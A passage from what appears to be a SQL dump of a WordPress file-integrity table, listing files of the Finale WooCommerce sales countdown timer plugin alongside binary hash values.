jh\0\'','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/compatibilities/class-wcct-compatibility-polylang.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˩GÁYV','مuB%8gU>:χL<h','',0,'?'),('5cNk{Su','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/compatibilities/class-wcct-compatibility-qtranslatex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|S<a\Z#*B?J','<\\jM!s0MQ<;}`xuU?3C','',0,'?'),('\Zƪ$U=\"','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/compatibilities/class-wcct-compatibility-theme-flatsome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɚIA؀j֮°','WޘUUG7i{,.;','',0,'?'),('N_f}','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/compatibilities/class-wcct-compatibility-with-aelia-cs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZzbK6a~','7 ב\'\0O9I','',0,'?'),('d\0in4F','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/compatibilities/class-wcct-compatibility-with-wc-currency-switcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ŀCaV^N&U','ZiP(O&*ƉE}1 \\KCos','',0,'?'),('%G<C]hh8+','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/compatibilities/class-wcct-compatibility-with-wc-multi-currency.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D	(Dp','f~2	i6$;T\Z[[','',0,'?'),('.3Bʅ2','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/compatibilities/class-wcct-compatibility-woo-picker-location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'\nw![|`','LrwN[(~V%Ew/4t̝','',0,'?'),('FQѼW5','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/compatibilities/class-wcct-compatibility-woocs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȖW!\0tȩ',';/)m2UR:S57	','',0,'?'),('a3sl$','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/compatibilities/class-wcct-compatibility-yith-woocommerce-product-bundles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r\ns*','NLLQ;v4~\n8L%I\nyڲP','',0,'?'),('ȹE+i49a','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/finale-woocommerce-sales-countdown-timer-discount-plugin-lite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?LQJZM_n','/QX\r7&G=%5]_w','',0,'?'),('Ð`^q','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('T%g(RL','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/wcct-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z59j4!HO2V','\raH(kDɀ<A;BŎ<','',0,'?'),('Tɫ7i$Ku9)','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/wcct-appearance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'5:H8g%,z','W<)sie{xb=G55<䳶7','',0,'?'),('VT2~SY/u','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/wcct-campaign-public.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T:FU@GEl','䯡;ܹH;A[dl{.$v79=Kq','',0,'?'),('Z yMlo','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/wcct-cart.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ЇaH#L5v','8\n⯯v>?fiIF5vy','',0,'?'),('ޜ!H!֛','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/wcct-common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\'%RK<4','DIV~=&b75b_}L1+ɒ','',0,'?'),('C\ZKqK','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/wcct-discount.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`AIB','Yl]g}=v\\ɾtXgwT$YIN+','',0,'?'),(']8)6`7Ԅ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/wcct-logging.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݜ5v[O;y','s%I|hiOA\n]0z8-A','',0,'?'),('[+Nߨ6-','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/wcct-mobile-detect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\'Nj','Ȱ߶ &_TǘԽ','',0,'?'),('*[֤!}g$p','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/wcct-stock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U#U`W','A\Z-:z!Npi<tk\'Y','',0,'?'),(';̓lO.W^v','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/wcct-themes-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';R*l\nww8','eT薠xfݚ6yW[}','',0,'?'),(';I\0;B]vR}%','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/wcct-triggers-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Io3^','^`\"ᄲ)Ў׳\rvڠ','',0,'?'),(':kߺ}l*>3','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/includes/wcct-xl-support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n8ȼ|G!$i','$r0oY\'|%_ܽ','',0,'?'),('uX`cK\'D','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('Ը]@$\"','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/languages/finale-woocommerce-sales-countdown-timer-discount.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X$vc61U^\0J','ق0ވFEoqHc;','',0,'?'),('D!\' }m','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/languages/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AEB>Fp@','k~	UH\ZxPĀ<;X','',0,'?'),('_RϪr','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<4:߂DqZ%Q\"','F}ՌOX	##','',0,'?'),('Lcvb~K\"n','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6Հ4T1[','ruwN?6\"]~(zD','',0,'?'),('WMEol&df','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/class-wcct-compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m%','c%bl/˭)dl*J>x','',0,'?'),('Is3{x!~','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/class-wcct-input-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eY2\\qrVމ/','?exAkD&\n*&`OSQw1!C','',0,'?'),('fy,\0<..?TP','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('@6.TRX','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/inputs/chosen-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S+S','w}Ί\ZQƿueq	\'D&m-a','',0,'?'),('Sݕ/RԮ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/inputs/html-always.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8*׼TM@iS\n','k}N?v[y4슸6Q.g+','',0,'?'),('J\\&8q|l\0','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/inputs/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('XhM}AR\r.d9','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/inputs/product-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ç4\'cq','K	3ؤޒoO+&\\sh\nD8dWP','',0,'?'),(':Jw]@W','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/inputs/select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[`$)D\n',')*)z*XF	AM\nX(','',0,'?'),('a `6N','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/inputs/text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MLǈfFl','(c9<َ\'v\nKB.PxZ*E[','',0,'?'),('e&*Pn\r_3B^','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/rules/base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɍ[ŧbߊU','g\0H%iI\"LU㗆%','',0,'?'),('p%q[AoG','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/rules/general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D!Pz;`r','H/*:z)i]cPj(QZVe','',0,'?'),('GQ-Z#A','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/rules/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('/Y7`b\ZM','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/rules/rules/products.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-|t_UL','{-dݣ	la\'n','',0,'?'),('&Eu3zO','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/start.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z/+ćKב(',')^(	k;\Z싶?op','',0,'?'),('vcGZ/5\nu','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/accessories-shop/accessories-shop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\n@JH @~5m','ay*3߻}7*tJ','',0,'?'),('}d#M}Z{','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/accessories-shop/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('\Z.kSH3z','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/astra/astra.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zqlK','r·<zM3`k+pt/l->','',0,'?'),('>(l[','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/astra/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('Dc_B\r[	','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/aurum/aurum.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f+\"','fzC@zn9ܯRcqT','',0,'?'),('}!&u	G$','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/aurum/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('kOwoL箏P','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/betheme/betheme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CT@?T@s[','G#bh .z% 51~٫','',0,'?'),('jeC','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/betheme/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('9WHNO]','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/boxshop/boxshop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QV?vPߤVTlj,','\0Mn Pt-ő_)hPn	','',0,'?'),('j2΀oL','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/boxshop/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('HIyMrU','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/claue/claue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׌2BVq\r','55\rב61t6{gٟi$m','',0,'?'),('ikEt>YiZG0N','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/claue/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('8\\?$wҺc','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/denso/denso.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*Tiv̦!','XH5%IuRO}jqhu','',0,'?'),('v:WQ$~N8','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/denso/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('5!iD7\\t\Z','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/electro/electro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2hVK]lU3`!2','G3.H\0(Sǆ3bD}xlI	u(','',0,'?'),('/a	3IɆ\Zy','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/electro/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('0.ޅ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/eva/eva.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BUX','\\/x\"G3*vrqD{','',0,'?'),('/>ǅVJkR$','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/eva/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('ql/h?','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/flatsome/flatsome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{˔9\rNu]Xq','(¬.i<hZq\"6vKF̈́g.+','',0,'?'),(',[Ub\n雀Ա','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/flatsome/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('qΕq՗6|','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/float/float.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%#eo$Ԅ%^','jĶL!!(ߺ%\ne -Eb\'','',0,'?'),('g\Z_=Ve:AX','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/float/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('gYs\'J2,GMV','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/hcode/hcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$IAuNhȠo','=!K\Z-HTPb3\0Kq','',0,'?'),('{&l#mr5K','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/hcode/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('%<Kڢ4U2Al','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('\r%(b-%\"','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/kallayas/kallayas.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&Ƿ\rCT','ΐT~牶<_Ly','',0,'?'),('\"J)^J;','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/merchandiser/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('k }3]E','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/merchandiser/merchandiser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e^ρJ}5aIH{','_3p̑ckG4]\\JbA\'&','',0,'?'),('.Q,\'/ESCk`','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/nitro/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('E宴1Eq܇5','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/nitro/nitro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\02EbAYUBc','F<n=]>	2\Z	{','',0,'?'),('	3aoe$\Z)`','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/oceanwp/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('IVR\\yBW\"h','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/oceanwp/oceanwp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tsQj','1,ܡDH|qi{','',0,'?'),('m:O7Y%','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/oxygen/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('ڡy(ܻS\n','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/oxygen/oxygen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bj-U+K&T','0C̟1\0:>tuNҀϭAA35','',0,'?'),('sknȢ]','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/porto/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('|$ČmS:!','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/porto/porto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zoitv','W8!wOn1(=+5R#]\'M','',0,'?'),('kwJ\0U+','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/savoy/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('^$#ņ6','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/savoy/savoy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӌ<1hFX{-','UI;޿j[^+,b)','',0,'?'),(']f5yhU|Cz4','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/shopkeeper/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),(']ȁJגÐYC','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/shopkeeper/shopkeeper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','APrP-{){c.','Pzђ%٤i,sFGlPB','',0,'?'),('wZ,=Kc','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/sober/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('Owʌi+m','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/sober/sober.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l#;PzM',']\0>Pe|$7','',0,'?'),('o~Iێyi','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/techmarket/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('k0~k2%:E	','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/techmarket/techmarket.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0y-y',' K=\rr׺G3HMc»j','',0,'?'),('_QO\"2\'','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/the-7/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('LQ<kx','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/the-7/the-7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-B\n~ԒW;2I','ӭ}otC8h}a	6I:h#','',0,'?'),('Q&Č3T[~','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/thegem/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('Z&I\ZPD\"','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/thegem/thegem.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}k9\"@.41ې',';{ì\Z3lDЄF','',0,'?'),('U0_?v3','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/traveler/traveler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-byd;Ŭ','<D!r\",|4:Y2','',0,'?'),('ό7\r$','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/tucson/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('s80Nd','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/tucson/tucson.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n/\ZjYkr',',뱾\r=:`acu$nP[OZE','',0,'?'),('tfV;Ojg','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/uncode/uncode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W^v~jm7W','Ov\'^m;4],~H','',0,'?'),('K+F3RHi\r!%','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/woodmart/woodmart.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\06%|u;(','O[X>>jIʌrƗ!;U|B','',0,'?'),('7\"4pФ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/wowmall/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('Hc[<t','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/wowmall/wowmall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t{|+F\'!','NpUh	Gs$','',0,'?'),('\"E+xnH','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/x-store/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('>\"XaD5FZҍ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/theme-support/x-store/x-store.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɗzr\")b','+s9A\n	g?+&z3','',0,'?'),('k?Y̪','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/woo-includes/class-wcct-wc-dependencies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BVފ>0@','gMyPG`{عּ7pnQK','',0,'?'),('TWjz	U\0','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/woo-includes/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('b3*\"eϠ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/woo-includes/woo-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tmyZ+W','01(Ko`ƒQ.(>¹afw','',0,'?'),('[q9v\r	)','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/img/XL_notification_optin_image.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<x.\\;+u+','`cP[2S=жHX!rIA4','',0,'?'),('<1vFa','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/img/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('i)Z[ۋ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/img/noimage.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"QlAS>Q','m*-isYE=70c','',0,'?'),('[l$ˉ׵f6@>','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-addon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','* l4,q[','ӽX>\09=2Z.F]','',0,'?'),('vL%`sŎ&A1','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ΨoUOzb','(Nav{%L0?H]׺E-[+&Y#','',0,'?'),('<$V*=\\','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-admin-notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0ܯs]8','~Q%K/-:1V(o','',0,'?'),('e%\\گwl','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k<W`]','/ݣޙg1#`4Rm3S{`','',0,'?'),('\\nQkIy ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c4ԏ[$O`','B@b2\"=1y|','',0,'?'),('XB^V>f}','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-dashboard-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';^4spѸ+n>','vĤQ;{)6HNm&_\rp','',0,'?'),('7-W&','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-deactivation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':0*˯',')uމ;eSNkmK25gU','',0,'?'),('4-:J1c','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-file-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rra-zp,Z',' UycasXpT)6','',0,'?'),('YKE\r','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-licenses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\0!S,z~','/\ZX&@WAdc#8','',0,'?'),('n.{\\Wd','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-opt-in-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϱ^.','$Qv\r>\'ql6`J%![','',0,'?'),('،,[bd)K[vu','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-plugin-states.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RV\rKQʍ','nzsKX9	5?CsMs3^','',0,'?'),('Xp5蛰,','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-process.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#܋41.@','\"-wUAV	KӢc06H3Oa','',0,'?'),('I\'%ʞ;','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~d]w','$?ݭ+w?!|W8D','',0,'?'),('lhǹÒ?ȵ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-transients.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0fU,u&','eR%]xD<\0>\0p.J','',0,'?'),('X\0N>ڹ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/xl/includes/class-xl-updater-licenses-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(d m}','\0ZF4-)	